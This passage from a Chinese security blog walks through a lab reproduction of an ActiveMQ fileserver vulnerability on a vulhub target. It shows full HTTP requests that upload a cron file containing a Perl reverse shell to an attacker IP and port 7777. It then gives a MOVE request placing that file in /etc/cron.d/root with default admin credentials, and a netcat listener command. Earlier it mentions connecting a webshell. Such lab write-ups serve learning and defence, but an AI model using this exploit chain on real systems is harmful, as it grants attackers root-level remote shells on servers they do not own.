<p>5、连接webshell</p>
<p>这里用蚁剑演示一下，<strong>重点是记住admin应用是需要登录的，所以记得一定要在连接中添加Authorization头</strong>。</p>
<p>基础配置：</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715594920183-31.png" alt="Image"></p>
<p>请求信息：</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715594937005-33.png" alt="Image"></p>
<h3 id="途径3：写入cron拿反弹shell"><a href="#途径3：写入cron拿反弹shell" class="headerlink" title="途径3：写入cron拿反弹shell"></a><strong>途径3：写入cron拿反弹shell</strong></h3><p>前提条件</p>
<blockquote>
<p>需要运行ActiveMQ的用户有root权限</p>
<p>服务器开启了cron服务</p>
<p>运行ActiveMQ的用户有使用crontab的权限</p>
</blockquote>
<p>前两点在知识拓展中已经被证明满足了，而第3点在默认情况下是满足的，除非存在cron.allow或者cron.deny文件，但这两个文件在vulhub提供的漏洞环境中并不存在。因此本环境理论上可以通过写入cron拿反弹shell。</p>
<p>思路分析</p>
<p>这种方法思路就比较简单了：</p>
<blockquote>
<p>上传cron文件到fileserver</p>
<p>把cron文件从fileserver转移到&#x2F;etc&#x2F;cron.d&#x2F;ele</p>
<p>攻击机上开启监听并等待反弹shell连接</p>
</blockquote>
<p>这个网页有反弹shell合集，可以参考：<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/247967.html">反弹shell的方法总结</a></p>
<p><strong>需要注意以下三点</strong>：</p>
<blockquote>
<p>首先是vulhub提示的cron配置文件中换行一定要\n，不能是\r\n，否则crontab执行会失败。这一点在下面的漏洞利用过程中没有体会到。</p>
<p>另外，&#x2F;etc&#x2F;cron.d 文件夹中的任务文件命名有特殊要求，只能使用 [\w-] 字符，不能有 . （<a target="_blank" rel="noopener" href="https://blog.51cto.com/u_13886444/2317402">&#x2F;etc&#x2F;cron.d 攻略</a>）</p>
<p>vulhub提供的示例中反弹shell用的是perl shell，这个反弹shell能成功的前提是服务器上安装了perl，另外，是否需要知道perl的绝对路径要看运气（看服务器上是否有相关的软链接）。</p>
<p>测试过程中我也尝试了cron文件中写bash反弹shell，但是反弹shell没有执行成功，目前还不知道是什么原因。网上搜索cron反弹shell的资料时，发现有人在其他环境上尝试bash反弹shell也没成功。。</p>
</blockquote>
<p>利用步骤</p>
<p>1、上传cron文件到fileserver</p>
<p>payload如下，需要修改Host头</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>JSESSIONID=1afx396fq4o7818mkoe7sa03x1</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Referer</span><span class="punctuation">: </span>https://1774-0c4e2302-81dd-47b3-b00a-4f026f54df7d.do-not-trust.hacking.run/</span><br><span class="line"><span class="attribute">Authorization</span><span class="punctuation">: </span>Basic YWRtaW46YWRtaW4=</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">Sec-Fetch-Dest</span><span class="punctuation">: </span>document</span><br><span class="line"><span class="attribute">Sec-Fetch-Mode</span><span class="punctuation">: </span>navigate</span><br><span class="line"><span class="attribute">Sec-Fetch-Site</span><span class="punctuation">: </span>same-origin</span><br><span class="line"><span class="attribute">Sec-Fetch-User</span><span class="punctuation">: </span>?1</span><br><span class="line"><span class="attribute">Te</span><span class="punctuation">: </span>trailers</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>243</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">*/1 * * * * root perl -e &#x27;use Socket;$i=&quot;192.168.108.129</span><br><span class="line">&quot;;$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i))))&#123;open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;/bin/sh -i&quot;);&#125;;&#x27;</span><br></pre></td></tr></table></figure>

<p>请求数据部分是cron文件格式的perl反弹shell，*&#x2F;1 * * * *表示定时任务执行时间是每分钟一次，root表示执行定时任务的用户，后面就是perl反弹shell的内容了。万一服务器上没有perl的软链接，就需要写perl的绝对路径了，比如&#x2F;usr&#x2F;bin&#x2F;perl</p>
<p>此外还要注意，反弹shell中的$i为攻击机ip，$p为攻击机监听的端口。</p>
<p>Response报文状态码204表示文件上传成功</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715595002379-35.png" alt="Image"></p>
<p>2、 将GET改为MOVE方式，把它移动到&#x2F;etc&#x2F;cron.d&#x2F;root目录下,路径为Destination: file:&#x2F;&#x2F;&#x2F;etc&#x2F;cron.d&#x2F;root</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">MOVE /fileserver/ele.txt HTTP/2</span><br><span class="line">Destination: file:///etc/cron.d/root</span><br><span class="line">Host: 1774-0c4e2302-81dd-47b3-b00a-4f026f54df7d.do-not-trust.hacking.run</span><br><span class="line">Cookie: JSESSIONID=1afx396fq4o7818mkoe7sa03x1</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Referer: https://1774-0c4e2302-81dd-47b3-b00a-4f026f54df7d.do-not-trust.hacking.run/</span><br><span class="line">Authorization: Basic YWRtaW46YWRtaW4=</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Sec-Fetch-Dest: document</span><br><span class="line">Sec-Fetch-Mode: navigate</span><br><span class="line">Sec-Fetch-Site: same-origin</span><br><span class="line">Sec-Fetch-User: ?1</span><br><span class="line">Te: trailers</span><br><span class="line">Connection: close</span><br></pre></td></tr></table></figure>

<p>Response报文状态码204表示文件转移成功</p>
<p>3、攻击机上开启监听并等待反弹shell连接</p>
<p>攻击机上用nc开监听，监听7777端口，命令如下：</p>
<p>nc -l -p 7777</p>
<p>耐心等一会儿，就能连上服务器了</p>

            </div>

            <!-- Comments -->
            
                <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                    


                </div>
            
        </div>
        <!-- Tags and categories -->
        
        <div class="row justify-content-between article-taxonomy">
            <div class="col-lg-4 col-lg-offset-2 col-md-5 col-md-offset-1">
                
                    


<a href="/tags/漏洞复现/" class="text-decoration-none text-secondary">#漏洞复现</a>


                
            </div>
            <div class="col-lg-4 col-md-5 text-end">
                
            </div>
        </div>
        

    </div>
</article>



        <footer class="site-footer">
      <div class="container">
        <div class="site-footer-inner">
          <div class="footer-copy">Copyright 2024 evabd21 | Security notes with a cleaner presentation.</div>
          <div class="footer-links">
            <a href="/getting-start">About</a>
            <a href="/archives">Archives</a>
            <a target="_blank" rel="noopener" href="https://github.com/evabd21/evabd21.github.io">Github</a>
          </div>
        </div>
      </div>
    </footer>
  </div>


    <!-- After footer scripts -->
    <!-- Disqus Comments -->



   

<!-- hexo injector body_end start --><script src="https://cdn.jsdelivr.net/npm/bs5-lightbox@1.8.3/dist/index.bundle.min.js"></script><!-- hexo injector body_end end --></body>

</html>